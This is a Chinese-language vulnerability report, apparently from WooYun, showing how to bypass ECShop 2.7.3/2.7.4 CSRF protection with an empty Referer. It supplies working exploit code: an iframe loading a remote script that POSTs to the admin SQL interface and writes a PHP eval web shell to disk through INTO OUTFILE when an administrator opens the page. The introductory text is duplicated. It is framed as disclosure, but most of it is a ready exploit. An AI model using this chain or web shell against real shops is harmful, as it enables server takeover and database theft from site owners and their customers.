ecshop csrf防御绕过后台敏感功能csrf getshell

摘要

csrf防御绕过 。 可以csrf执行后台各种敏感功能。这里分析的是利用空referer的方式绕过。参考http://zone.wooyun.org/content/744

利用这个绕过 可以实现ecshop各个版本的csrf getshell ，csrf dump数据库。测试了2.7.3一个版本和最新的2.7.4

本文可以看做该帖子的http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术.

exp1,csrf getshell 利用执行sql的接口，结合报路径漏洞。

新建html文件内容为：

<iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe>

新建 http://127.0.0.1/ecshop2.7.4/csrf.js js文件。内容为：

简要描述：

csrf防御绕过。

详细说明：

可以csrf执行后台各种敏感功能。这里分析的是利用空referer的方式绕过。参考http://zone.wooyun.org/content/744

利用这个绕过可以实现ecshop各个版本的csrf getshell，csrf dump数据库。测试了2.7.3一个版本和最新的2.7.4

本文可以看做该帖子的http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术.

exp1,csrf getshell 利用执行sql的接口，结合报路径漏洞。

新建html文件内容为：

<iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe>

新建 http://127.0.0.1/ecshop2.7.4/csrf.js js文件。内容为：

code 区域

var url="http://127.0.0.1/ecshop2.7.4/admin/sql.php";    var sendata = "sql=select+%22%3C%3Fphp+%40eval%28%24_POST%5B%27c%27%5D%29%3B%3F%3E%22+into+outfile+%27C%物理路径Ctestcsrf.php%27%3B&act=query";    if (window.XMLHttpRequest){    var xmlhttp1=new XMLHttpRequest();    }    else{    var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP");    }    xmlhttp1.open("POST",url,true);    xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");    xmlhttp1.send(sendata);

管理员访问链接即可生成testcsrf.php的文件。

这里仅仅使用这个接口做一个案例，后台大量的接口，敏感操作都暴漏在csrf的威胁之下了。